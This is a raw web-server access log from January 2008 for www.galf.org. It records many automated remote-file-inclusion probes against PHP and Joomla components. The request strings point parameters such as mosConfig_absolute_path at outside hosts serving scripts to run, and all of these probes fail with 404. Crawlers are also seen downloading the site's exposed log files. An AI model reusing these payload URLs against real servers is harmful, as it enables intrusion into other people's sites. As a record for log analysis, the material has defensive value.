65.38.184.28 - - [27/Jan/2008:16:00:31 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.184.28 - - [27/Jan/2008:16:00:31 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:01:10 -0800] "GET /logs/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:01:11 -0800] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.214.230 - - [27/Jan/2008:16:02:35 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.85.52.146 - - [27/Jan/2008:16:03:00 -0800] "GET /logs/access_071105.log/modules/Forums/favorites.php?nuke_bb_root_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.52.146 - - [27/Jan/2008:16:03:00 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.52.146 - - [27/Jan/2008:16:03:00 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.159.200.63 - - [27/Jan/2008:16:04:27 -0800] "GET /logs/access.log HTTP/1.0" 200 1726 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
193.136.19.139 - - [27/Jan/2008:16:05:10 -0800] "GET //login.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
193.136.19.139 - - [27/Jan/2008:16:05:10 -0800] "GET /logs//login.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:05:25 -0800] "GET /logs/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:05:25 -0800] "GET /logs/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:05:25 -0800] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:05:25 -0800] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.235 - - [27/Jan/2008:16:05:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.235 - - [27/Jan/2008:16:05:34 -0800] "GET /logs/access_071203.log HTTP/1.0" 200 1048576 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.235 - - [27/Jan/2008:16:05:34 -0800] "GET /logs/access_080107.log HTTP/1.0" 200 720896 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
83.223.100.182 - - [27/Jan/2008:16:06:54 -0800] "GET /logs/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.223.100.182 - - [27/Jan/2008:16:06:55 -0800] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [27/Jan/2008:16:08:54 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.79 - - [27/Jan/2008:16:11:28 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.120.241.242 - - [27/Jan/2008:16:12:22 -0800] "GET /logs/access_071217.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [27/Jan/2008:16:12:22 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [27/Jan/2008:16:12:22 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:13:11 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:13:11 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:13:11 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:13:29 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:14:00 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:14:01 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:14:01 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:14:02 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:14:02 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:14:02 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:10 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:10 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:10 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:14:14 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:14:17 -0800] "GET /logs/access_071224.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:14:30 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:42 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:43 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:14:43 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:15:38 -0800] "GET /logs/access_071224.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:15:39 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:15:39 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.73.13.24 - - [27/Jan/2008:16:16:13 -0800] "GET /logs/access_071210.log/default.php?arquivo=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.73.13.24 - - [27/Jan/2008:16:16:15 -0800] "GET /default.php?arquivo=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.90 - - [27/Jan/2008:16:16:16 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.73.13.24 - - [27/Jan/2008:16:16:16 -0800] "GET /logs/default.php?arquivo=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.156.5.7 - - [27/Jan/2008:16:16:36 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:16:57 -0800] "GET /index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:17:35 -0800] "GET /index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:16:17:45 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:16:17:46 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:17:48 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:17:48 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:17:48 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:18:08 -0800] "GET /logs/access_070827.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.55.208.228 - - [27/Jan/2008:16:18:35 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 65536 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
84.19.178.201 - - [27/Jan/2008:16:19:19 -0800] "GET /logs/access_070827.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:19:24 -0800] "GET /logs/access_071217.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.66.236.234 - - [27/Jan/2008:16:19:34 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/custom?q=lesbianas&hl=es&client=pub-4740476203552548&cof=FORID:1%3BGL:1%3BLBGC:336699%3BLC:%230000ff%3BVLC:%23663399%3BGFNT:%230000ff%3BGIMP:%230000ff%3BDIV:%23336699%3B&oe=ISO-8859-1&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:20:19 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:20:19 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:20:19 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:20:19 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:20:19 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:20:20 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.26.137.64 - - [27/Jan/2008:16:21:22 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [27/Jan/2008:16:21:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:16:21:40 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adambrown.eu/sessions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [27/Jan/2008:16:21:41 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adambrown.eu/sessions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:21:53 -0800] "GET /logs/access_070827.log/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:21:53 -0800] "GET /index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:21:53 -0800] "GET /logs/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.147.134.12 - - [27/Jan/2008:16:22:06 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.147.134.12 - - [27/Jan/2008:16:22:07 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.147.134.12 - - [27/Jan/2008:16:22:07 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.147.134.12 - - [27/Jan/2008:16:22:07 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:22:29 -0800] "GET /logs/access_071217.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:22:46 -0800] "GET /logs/access_071217.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:22:55 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:16:22:55 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:24:21 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:16:24:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:24:24 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.178.114 - - [27/Jan/2008:16:25:01 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:25:49 -0800] "GET /logs/access_070827.log/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:25:49 -0800] "GET /index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.234 - - [27/Jan/2008:16:25:49 -0800] "GET /logs/index.php?_REQUEST=http://www.asyouwishweddings.com.au//on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.198.92 - - [27/Jan/2008:16:26:17 -0800] "GET /logs/access.log//login.php?dir=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.198.92 - - [27/Jan/2008:16:26:19 -0800] "GET //login.php?dir=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.198.92 - - [27/Jan/2008:16:26:20 -0800] "GET /logs//login.php?dir=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:28:11 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:28:11 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:28:12 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:29:52 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
66.7.198.92 - - [27/Jan/2008:16:31:05 -0800] "GET /logs/access_071105.log//login.php?dir=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.119 - - [27/Jan/2008:16:31:40 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.208.233 - - [27/Jan/2008:16:32:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.233 - - [27/Jan/2008:16:32:11 -0800] "GET /logs/access_080113.log HTTP/1.0" 200 1245184 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.6.22.119 - - [27/Jan/2008:16:33:18 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 7944900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:33:23 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:33:24 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:33:32 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:16:33:32 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.42.12 - - [27/Jan/2008:16:35:04 -0800] "GET /index.php?include=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:35:27 -0800] "GET /logs/access_071210.log/main.php?x=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:35:27 -0800] "GET /main.php?x=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:35:28 -0800] "GET /logs/main.php?x=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.106.131.26 - - [27/Jan/2008:16:36:14 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
87.106.131.26 - - [27/Jan/2008:16:36:14 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
213.203.217.26 - - [27/Jan/2008:16:37:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://all.meralo.de//components/com_simpleboard/teampl3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.217.26 - - [27/Jan/2008:16:37:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://all.meralo.de//components/com_simpleboard/teampl3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.44.89 - - [27/Jan/2008:16:38:47 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.28.224 - - [27/Jan/2008:16:38:51 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
